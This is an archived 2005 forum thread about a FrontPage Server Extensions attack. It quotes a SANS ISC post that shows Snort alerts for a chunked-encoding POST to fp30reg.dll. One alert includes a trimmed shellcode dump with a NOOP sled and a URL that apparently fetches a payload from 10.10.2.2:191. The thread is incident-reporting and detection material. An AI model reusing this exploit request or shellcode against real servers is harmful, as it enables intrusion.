|
Home > Archive > FrontPage Server Extensions for Windows > June 2005 > unusual FrontPage traffic caught in SNORT- http://isc.sans.org/
You are viewing an archived Text-only version of the thread.
To view this thread in it's original format and/or if you want to reply to
this thread please [click here]
| Author |
unusual FrontPage traffic caught in SNORT- http://isc.sans.org/
|
|
|
| There was a posting to http://isc.sans.org/ about unusual traffic captured in
SNORT in relation to a FRONTPAGE attack. Wondering if anyone from MS is
monitoring this and or if anyone else is seeing this.
Also, SP1 for 2003 server updates the extensions that origionally come with
the 2003 server. What are the upgrades?
Thanks.
| |
|
| Here was the post:
Unusual FrontPage Hack
Ryan Barnett (CIS Apache Benchmark Project Lead) writes in with some Snort
logs indicating an attempted Front Page hack on a system he is monitoring.
The first entry indicates an attempt to exploit the chunked-encoding
transfter bug:
[**] WEB-MISC Chunked-Encoding transfer attempt [**]
06/20-23:46:58.486734 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18331 IpLen:20 DgmLen:161 DF
***AP*** Seq: 0x5C80E4DE Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1..Host: 192.168.1.100
...Transfer-Encoding: chunked..Content-Length: 1499....
Which is a normal scan I'm sure many readers are familiar with. The unusual
bit is an x86 NOOP alert that followed:
[**] SHELLCODE x86 NOOP [**]
06/20-23:46:58.489143 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18332 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x5C80E557 Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
5db.........................g...................................
.................................................................
.................................................................
.................................................................
.................g...............................................
.......Ehttp://10.10.2.2:191/lsd.080/lsd..b.]3.f....u.....<.u.F..
,0F4...G..............q................rh.B.f..............q....
This output has been trimmed for space. Ryan indicates that there is no
internal host at 10.10.2.2 listening on port 191. If there are any other
readers with similar log entries matching port 191 or the /lsd.* URL, please
send them our way.
"R" wrote:
> There was a posting to http://isc.sans.org/ about unusual traffic captured in
> SNORT in relation to a FRONTPAGE attack. Wondering if anyone from MS is
> monitoring this and or if anyone else is seeing this.
>
> Also, SP1 for 2003 server updates the extensions that origionally come with
> the 2003 server. What are the upgrades?
>
> Thanks.
|
|
|
|
|